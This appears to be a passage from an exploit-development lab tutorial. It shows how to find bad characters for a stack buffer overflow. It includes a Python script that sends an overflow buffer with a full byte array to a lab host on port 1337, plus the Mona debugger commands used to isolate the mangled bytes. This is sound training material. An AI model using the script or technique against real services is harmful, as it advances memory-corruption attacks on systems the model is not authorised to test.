# Finding Bad Characters ## Possible Bad Characters Here's a list of all the characters that could possibly be bad characters. You might notice that `\x00` is not in the list below. That's because it's considered to be a bad character most of the time. ``` badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ) ``` ## Modifying POC We will again be modifying our initial code to include an array of bad characters in the buffer. By sending a buffer with bad characters. We would be able to determine the bad characters that are associated with the application via analysis on Immunity Debugger with the help of `Mona`. ### badChars.py ``` #!/usr/bin/python import socket try: print ("\nSending evil buffer...") badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ) prefix = "OVERFLOW10 " filler = "A" * 537 eip = "B" * 4 buffer = prefix + filler + eip + badchars s = socket.socket (socket.AF_INET, socket.SOCK_STREAM) s.connect(("windows.box", 1337)) s.send(buffer) s.close() print ("\nDone!") except: print ("\nCould not connect!") ``` ## Bad Chars ``` python badChars.py ``` ![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdOcy1ba9EGn2GQ7ELK%2F-MdcCW79_I5GWSwJYunR%2F-MdcCf6I6u3GSZlMpCGM%2Fimage.png?alt=media\&token=11d2e4c0-0462-4900-a74a-e0d3153fa4b9) ![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdOcy1ba9EGn2GQ7ELK%2F-MdcCW79_I5GWSwJYunR%2F-MdcChialSn6pYM1X4LS%2Fimage.png?alt=media\&token=892bf66d-1460-4958-872b-8c29138c6a54) ![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdOcy1ba9EGn2GQ7ELK%2F-MdcCW79_I5GWSwJYunR%2F-MdcCp300ZImzYfNWaCZ%2Fimage.png?alt=media\&token=ac5b4302-5abb-4621-a351-98627721167f) Once the bad chars are sent in, following the `ESP` location in dump reveals to us where our chars are. With this, we would be able to do further analysis with `mona` and locate the actual bad characters. ### Setting working directory for Mona ``` !mona config -set workingfolder c:\Temp ``` ![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdOcy1ba9EGn2GQ7ELK%2F-MdcD0KlUT742Xxl5Ghq%2F-MdcDJ5TLfJij9kL7Is0%2Fimage.png?alt=media\&token=1a0cb4db-931d-4189-9c47-319cfbe6e4b7) ### Creating Bytearray with Mona ``` !mona bytearray -b "\x00" ``` ![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdOcy1ba9EGn2GQ7ELK%2F-MdcD0KlUT742Xxl5Ghq%2F-MdcDSJ_WADrS-W3g4-S%2Fimage.png?alt=media\&token=3f025862-159a-425d-b4fe-047a6502bb2c) ### Locating Bad Characters ``` !mona compare -f C:\Temp\bytearray.bin -a ``` ![ESP address](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdOcy1ba9EGn2GQ7ELK%2F-MdcD0KlUT742Xxl5Ghq%2F-MdcDcb4erpDDIwNRgLX%2Fimage.png?alt=media\&token=474da25f-feef-4f0c-a014-54bae3267090) ``` !mona compare -f C:\Temp\bytearray.bin -a 0122FA18 ``` ![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdOcy1ba9EGn2GQ7ELK%2F-MdcD0KlUT742Xxl5Ghq%2F-MdcDljoWVKmGYlggdJB%2Fimage.png?alt=media\&token=308c67ad-faa1-4a56-8407-8bb7719ad727) ![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdOcy1ba9EGn2GQ7ELK%2F-MdcD0KlUT742Xxl5Ghq%2F-MdcDnQJ39QbR__jUYZ1%2Fimage.png?alt=media\&token=eac91c00-324a-4d4f-835b-75cedec34040) Now that we have the results, we have to remove every consecutive output under the Badchars tab excluding “\x00” as that is a bad character for all cases. We would end up with a bad character set of: ``` \x00\xa0\xad\xbe\xde\xef ```